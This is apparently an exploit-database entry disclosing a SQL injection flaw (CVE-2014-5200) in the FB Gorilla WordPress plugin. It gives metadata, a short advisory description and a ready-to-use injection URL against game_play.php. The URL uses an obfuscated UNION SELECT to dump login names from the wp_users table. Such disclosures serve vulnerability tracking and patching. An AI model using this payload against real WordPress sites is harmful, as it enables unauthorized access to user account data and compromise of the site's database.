WordPress Plugin FB Gorilla - 'game_play.php' SQL Injection

Author: Amirh03in
type: webapps
platform: php
port: 
date_added: 2014-07-28  
date_updated: 2016-01-21  
verified: 1  
codes: CVE-2014-5200;OSVDB-109641  
tags: WordPress Plugin  
aliases:   
screenshot_url:   
application_url:   

raw file: 39283.txt  
source: https://www.securityfocus.com/bid/69222/info

FB Gorilla plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users--